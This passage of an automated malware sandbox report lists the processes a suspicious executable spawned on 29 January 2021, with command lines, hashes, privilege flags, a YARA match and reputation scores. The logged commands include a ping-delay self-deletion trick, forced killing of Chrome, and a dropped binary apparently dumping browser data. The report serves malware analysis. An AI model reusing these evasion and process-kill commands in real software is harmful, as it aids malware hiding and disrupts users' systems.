                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:4247224 bytes
                                                                                                                                                    MD5 hash:63204EB716C856723A010747D58A6B00
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: cmd.exe PID: 6336 Parent PID: 1676

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: conhost.exe PID: 4328 Parent PID: 6336

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:41
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: PING.EXE PID: 6452 Parent PID: 6336

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:43
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Analysis Process: cmd.exe PID: 6012 Parent PID: 576

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:46
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: 1611970637183.exe PID: 6028 Parent PID: 476

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\1611970637183.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:103632 bytes
                                                                                                                                                    MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: conhost.exe PID: 1972 Parent PID: 6012

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:47
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: taskkill.exe PID: 5740 Parent PID: 6012

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:48
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:taskkill /f /im chrome.exe
                                                                                                                                                    Imagebase:0x330000
                                                                                                                                                    File size:74752 bytes
                                                                                                                                                    MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Analysis Process: cmd.exe PID: 6752 Parent PID: 576

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:49
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 6528 Parent PID: 6752

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: PING.EXE PID: 6624 Parent PID: 6752

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:50
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: ThunderFW.exe PID: 7156 Parent PID: 476

                                                                                                                                                    General

                                                                                                                                                    Start time:17:36:59
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                    Imagebase:0x990000
                                                                                                                                                    File size:73160 bytes
                                                                                                                                                    MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, Metadefender, Browse
                                                                                                                                                    • Detection: 2%, ReversingLabs

                                                                                                                                                    Analysis Process: cmd.exe PID: 6236 Parent PID: 476

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:05
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: conhost.exe PID: 6304 Parent PID: 6236

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:05
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Analysis Process: PING.EXE PID: 4248 Parent PID: 6236

                                                                                                                                                    General

                                                                                                                                                    Start time:17:37:06
                                                                                                                                                    Start date:29/01/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                    Imagebase:0x1120000
                                                                                                                                                    File size:18944 bytes
                                                                                                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >